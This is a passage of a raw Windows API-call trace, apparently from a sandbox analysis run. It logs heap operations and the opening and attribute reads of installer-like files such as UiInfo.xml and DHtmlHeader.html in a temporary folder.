dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.913] AreFileApisANSI () returned 1 [0061.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0061.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0061.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=47 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned 47 [0061.913] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444)) returned 1 [0061.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.913] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0061.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0061.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0061.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.914] AreFileApisANSI () returned 1 [0061.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml", lpUsedDefaultChar=0x0) returned 40 [0061.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.915] AreFileApisANSI () returned 1 [0061.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0061.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0061.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x6d1b8, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 40 [0061.915] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.916] GetFileType (hFile=0x41c) returned 0x1 [0061.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0061.916] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.916] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.916] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.916] CloseHandle (hObject=0x41c) returned 1 [0061.917] AreFileApisANSI () returned 1 [0061.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0061.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0061.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x6d058, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 40 [0061.917] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.917] GetFileType (hFile=0x41c) returned 0x1 [0061.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0061.917] CloseHandle (hObject=0x41c) returned 1 [0061.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.918] AreFileApisANSI () returned 1 [0061.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0061.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0061.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x6cd40, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 40 [0061.918] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882)) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.918] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x4e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x67908, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x4e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="l", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓颂")) returned 0 [0061.918] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0061.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0061.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0061.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.919] AreFileApisANSI () returned 1 [0061.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\DHtmlHeader.html", lpUsedDefaultChar=0x0) returned 39 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0061.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.919] AreFileApisANSI () returned 1 [0061.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0061.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cea0 [0061.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x6cea0, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 39 [0061.920] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0061.920] GetFileType (hFile=0x410) returned 0x1 [0061.920] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0061.920] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.920] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.920] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.920] CloseHandle (hObject=0x410) returned 1 [0061.921] AreFileApisANSI () returned 1 [0061.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d268 [0061.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x6d268, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 39 [0061.921] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0061.921] GetFileType (hFile=0x410) returned 0x1 [0061.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0061.921] CloseHandle (hObject=0x410) returned 1 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, 